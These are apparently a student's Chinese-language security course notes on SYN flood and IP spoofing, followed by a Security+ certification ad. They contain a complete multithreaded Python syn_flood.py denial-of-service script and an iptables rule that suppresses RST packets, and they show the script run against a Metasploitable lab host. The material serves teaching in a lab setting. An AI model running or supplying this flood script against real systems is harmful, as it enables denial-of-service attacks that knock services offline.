1. 程式人生 > >【安全牛學習筆記】Syn-Flood、IP地址欺騙

【安全牛學習筆記】Syn-Flood、IP地址欺騙

Syn-Flood                         

長伴隨IP欺騙                      

    - 真正的攻擊目標              

Scapy                             

    - i=IP()                      

    - i.dst=1.1.1.1               

    - i.display()                 

    - t=TCP()                     

    - srl(i/t,verbose=1,timeout=3)

    - sr1(IP(dst=1.1.1.1)/TCP())

[email protected]:~$ ifconfig

[email protected]:~# scapy()

INFO: Can't import python gnuglot wrapper . won't be able to plot.

WARNING: NO route found for IPV6 destination :: (no default route?)

welcome to Scapy (2.3.2)

>>> exit()

[email protected]

:~# apt-get install python gnuplot

[email protected]:~# scapy

WARNING: NO route found for IPV6 destination :: (no default route?)

welcome to Scapy (2.3.2)

>>> i=iP

>>> i.display()

###[ IP ]###

  version= 4

  ihl= None

  tos= 0x0

  len= None

  id= 1

  flags= 

  frag= 0

  ttl= 64

  proto= tcp

  chksum= None

  src= 127.0.0.1

  dst= 127.0.0.1

  \options\

>>> i.dst="192.168.1.110"

>>> i.display()

###[ IP ]###

  version= 4

  ihl= None

  tos= 0x0

  len= None

  id= 1

  flags= 

  frag= 0

  ttl= 64

  proto= tcp

  chksum= None

  src= 192.168.1.109

  dst= 192.168.1.110

  \options\

>>> t=TCP()

>>> t.display()

###[ TCP ]###

     sport= ftp_data

     dport= http

     seq= 0

     ack= 0

     dataofs= None

     reserved= 0

     flags= S

     window= 8192

     chksum= None

     urgptr= 0

     options= {}

>>> t.dport=22

>>> t.display

###[ TCP ]###

     sport= ftp_data

     dport= ssh

     seq= 0

     ack= 0

     dataofs= None

     reserved= 0

     flags= S

     window= 8192

     chksum= None

     urgptr= 0

     options= {}

>>>srl(i/t,verbose=1,timeout=2)

Begin emission:

Finished to send 1 packets.

Received 2 packets, got 1 answers, remaining 0 packets

<IP version= 4L ihl=5L tos= 0x0 len=44 id= 1 flags=DF  frag=OL ttl= 64 proto= tcp chksum=0xb6a0 src= 192.168.1.110 dst= 192.168.1.109 options=[] |<TCP  sport= ssh dport=ftp_data seq=3703105205 ack= 1 dataofs= 6L reserved=OL flags=SA window=5840 chksum=0x397d urgptr= 0 options= {('MSS',1460)} |<Padding load='\x00\x00' |>>>

wireshark

ip.addr eq 192.168.1.110

Syn-Flood                                                           

攻擊指令碼:./syn_flood.py                                               

    - iptables -A OUTPUT -p tcp --tcp-flags RST -d 1.1.1.1 -j DROP      

    - netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'

    - windows系統預設半開連線數10

 LISTEN S伺服器埠處於偵聽狀態,等待連線請求
SYN-SENT C發起連線請求,等待對端響應
SYN-RECV S已收到連線請求
ESTABLISHED  C/S三次握手成功,TCP連線已經建立
FIN-WAIT-1  C/S等待對端響應中斷請求確認,或對端終端請求
FIN-WAIT-2  C/S等待對端傳送中斷請求
 CLOSE-WAIT C/S等待本地 程序/使用者 關閉連線
 CLOSING C/S等待對端響應連線中斷確認 
 LAST-ACK  C/S等待對端響應之前的連線中斷確認
TIME-WAIT C/S等待足夠時間長度確保對端收到連線中斷確認(最大4分鐘)
 CLOSED C/S無任何連線狀態

[email protected]:~# iptables -A OUTPUT -p tcp --tcp-flags RST -d 192.168.1.110 -j DROP

[email protected]:~# iptable -L

Chain INPUT (policy ACCEPT)

target     port opt source              destination

Chain FPRWARD (policy ACCEPT)

target     port opt source              destination

Chain OUTPUT (policy ACCEPT)

target     port opt source              destination

DROP       tcp  -- anywhere             192.168.1.110        tcp flags:RST/RST

[email protected]:~# cp /media/sf_D_DRIVE/指令碼/syn_flood.py .    //拷貝到當前目錄

[email protected]:~# ls

Desptop    Downloads  Pictures  sys_flood.py  Videos

Documents  Music      public    Templates

[email protected]:~# geany syn_flood.py

------------------------------------------------------------

#!/usr/bin/python

# .*. coding: utf-8 -*

from scapy.all import *

from time import sleep

import thread

import random

import logging

logging.getLogger("scapy.runtime").setLevel(Logging.ERROR)

if len(sys.argv) != 4:

    print "用法:  ./syn_flood.py [IP地址] [埠] [執行緒數]"

    print "舉例:  ./syn_flood.py 1.1.1.1 80 20"

    sys.exit()

target = str(sys.argv[1])

port = int(sys.argv[2])

threads = int(sys.argv[3])

print "正在執行 SYN flood 攻擊,按 Ctrl+C 停止攻擊."

def synflood(target,port):

    while 0 == 0

        x = random.randint(0,65535)

        send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)

for x in range(0,threads):

    thread.start_new_thread(synflood, (target,port))

while 0 == 0

    sleep(1) 

------------------------------------------------------------

[email protected]:~# ./syn_flood.py

WARNING: No route found for IPV6 destination :: (no default route?)

用法:  ./syn_flood.py [IP地址] [埠] [執行緒數]

舉例:  ./syn_flood.py 1.1.1.1 80 20

[email protected]:~# ./syn_flood.py 192.168.1.110 22 200

[email protected]:~# ssh [email protected]

The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.

RSA key fingerprint is SHA256:BQHM5EoHx9GCi0LuVscegPXLQOsuPs+E9d/rrJB84rk.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.

[email protected]'s password:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individal files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY , to the exten permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail,

last login: Thu Jun 16 07:25:55 2016

[email protected]:~$ exit

logout

Conection to 192.168.1.110 closed.

[email protected]:~# ssh [email protected]

[email protected]:~$ sudo netstat -n

[email protected]:~$ sudo netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'

SYN_RECV 254

C:\> net user yuanfh 123

[email protected]:~# openvas-stop

Stopping Openvas Services

[email protected]:~# rdestop 192.168.1.111

[email protected]:~# netstat -pantu | more

IP地址欺騙              

經常用於Dos攻擊         

根據IP頭地址定址        

    - 偽造IP源地址      

邊界路由器過濾          

    - 入站、出站        

受害者可能是源、目的地址

繞過基於地址的驗證      

壓力測試模擬多使用者      

上層協議(TCP序列號)

該筆記為安全牛課堂學員筆記,想看此課程或者資訊保安類乾貨可以移步到安全牛課堂

Security+認證為什麼是網際網路+時代最火爆的認證?

      牛妹先給大家介紹一下Security+

        Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重資訊保安管理相比,Security+ 認證更偏重資訊保安技術和操作。

       通過該認證證明了您具備網路安全,合規性和操作安全,威脅和漏洞,應用程式、資料和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍採納。

Security+認證如此火爆的原因?  

       原因一:在所有資訊保安認證當中,偏重資訊保安技術的認證是空白的, Security+認證正好可以彌補資訊保安技術領域的空白 。

      目前行業內受認可的資訊保安認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重資訊保安管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的資訊保安工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重資訊保安技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

       原因二: IT運維人員工作與翻身的利器。

       在銀行、證券、保險、資訊通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網路、系統、安全、應用架構、儲存為一體的綜合性技術崗。雖然沒有程式猿們“生當做光棍,死亦寫程式碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網路安全知識,掌握網路安全實踐。職業發展朝著網路安全的方向發展,解決國內資訊保安人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

        原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在資訊保安人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、網際網路公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

        在目前的資訊保安大潮之下,人才是資訊保安發展的關鍵。而目前國內的資訊保安人才是非常匱乏的,相信Security+認證一定會成為最火爆的資訊保安認證。

相關推薦

安全學習筆記Syn-FloodIP地址欺騙

Syn-Flood                          長伴隨IP欺騙                           - 真正的攻擊目標               Scapy                                 

安全學習筆記補充Proxytunnelstunnel4

security+ 信息安全 stunnel4 無需修改源代碼的情況下降TCP流量封裝與SSL通道內適用於本身不支持加密傳輸的應用 支持openssl安全特性

安全學習筆記XSS-簡介跨站腳本檢測和常見的攻擊利用手段

信息安全 security+ xss XSS攻擊WEB客戶端客戶端腳本語言 彈窗警告、廣告 Javascript 在瀏覽器中執行XSS(cross-site scripting) 通過WEB站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端的攻擊目的 註入客戶端腳本代碼

安全學習筆記XSS-簡介跨站腳本檢測和常見的攻擊利用手段2

信息安全 security+ xss ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS ┃┃攻擊WEB客戶端

安全學習筆記XSS的簡述

cookie 服務器 漏洞 安全 xss 1.Cross Site SCripting 攻擊者往Web頁面裏插入惡意Script代碼,當用戶瀏覽該頁時,嵌入其中Web裏面的Script代碼會被執行,從而達到惡意攻擊用戶的目的。

安全學習筆記XSS的利用

xss 惡意代碼 漏洞 反射型XSS1.概念 通過社會工程學等手段誘騙用戶點擊某個精心構造的鏈接,該鏈接會將惡意的js代碼提交給 有漏洞的服務器網站,並由服務器返回給受害者的客戶端執行。 2.POC -<scri

安全學習筆記Web掃描器(1)

安全 web 漏洞 1.偵察httrack可將目標網站的網頁全部爬取下來,減少偵察過程中與目標服務器發生的交互。 2.Nikto(1).檢測對象 掃描軟件版本 搜索存在安全隱患的文件 配置漏洞

安全學習筆記OSI網絡模型

http ssh stmp 安全 OSI網絡模型 物理層規定比特在物理介質中的傳輸方式,解決物理傳輸過程中的問題。 代表設備:中繼器,集線器(多端口中繼器) 數據鏈路層 在不可靠的網絡環境中進行可靠的數據傳輸。解決數據傳輸中可能出現的

安全學習筆記搜索引擎

安全、web、滲透、信息安全 搜索引擎 shodan爬取banner信息。搜索聯網設備。 常用關鍵字: netcity country CNport oshostname實例:cisco 200 ok 思科設備default password 默認密碼

安全學習筆記服務掃描

安全、web、滲透、信息安全 1.簡述 識別開放端口上的應用 識別目標操作系統 提高攻擊效率 2.分類 Banner信息獲取 服務識別 操作系統識別snmp分析 防火墻識別 3.Banner (1).含義

安全學習筆記Kali Linux 安裝-持久加密USB安裝熟悉環境熟悉BASH命令

security+ linux 信息安全 持久加密USB安裝-1LUKS: linux UNified Key Setup 磁盤分區加密規範 不依賴於操作系統的磁盤級加密 Windows——DoxBox 後端:dm-crypt 前端:cryptsetup 微軟的bitlocker將鏡像

安全學習筆記網絡配置更新升級安裝軟件包瀏覽器插件

信息安全;網絡配置[email protected]:~# dhclient eth0 //用來通過 dhcp 協議配置本機的網絡接口[email protected]:~# ifconfig 查看現在的ip地址[email protected]:~# ifc

安全學習筆記 Kali Linux安裝-熟悉環境

信息安全;security+;kali linux熟悉BASH命令 Ls、cd、pwd、cat、more、tail、cp、rm、top、ps、greg、ifconfig、netstat、awk、sort、route、mount、dmesg、find、whereis、Echo、vi 管道 shell腳本[

安全學習筆記基本工具-NETCAT(telnet/banner傳輸文本信息)

信息安全;security+;kali linux滲透測試常用工具經常使用且功能強大安全從業者必不可少的幫手Nc / ncatWireshackTcpdumpNETCAT-----NC網絡工具中的瑞士軍刀——小身材、大智慧偵聽模式/傳輸模式telnet/獲取banner信息傳輸文本信息傳輸文件目錄加密傳輸文件

安全學習筆記實驗環境

信息安全;security+;kali linux滲透測試準備實驗環境 滲透非授權系統的弊端 搭建自己的實驗環境安裝虛擬機微軟最新版軟件 http://msdn .microsoft.com/en-ca/subscriptions/aa336858windows虛擬機 http://dev.mod

安全學習筆記TOR

信息安全;security+;kali linux滲透測試保護隱私防止被追蹤誌願者組成長期在天朝完全無法使用 感謝 雲暗網 互聯網搜索引擎無法發現 互聯網黑市下載和看視頻是不道德的行為互聯網黑市交易的貨幣是比特幣比特幣很難在互聯網復原下載http://www.torproject.org/d

安全學習筆記搜索引擎SHODAN

信息安全 security+ 搜索引擎、SHODAN╋━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃搜索引擎 ┃┃公司新聞動態 ┃┃重要雇員信息

安全學習筆記

信息安全;security+; 弱點掃描╋━━━━━━━━━━━━━━━━━━━━╋┃發現弱點 ┃┃發現漏洞 ┃┃ 基於端口五福掃描結果版本信息(速度慢)┃┃ 搜索已公開的漏洞數據庫

安全學習筆記​ NESSUS

信息安全;security+; NESSUS╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃NESSUS ┃┃家庭版

安全學習筆記NEXPOSE

信息安全;security+;NEXPOSE Rapid 7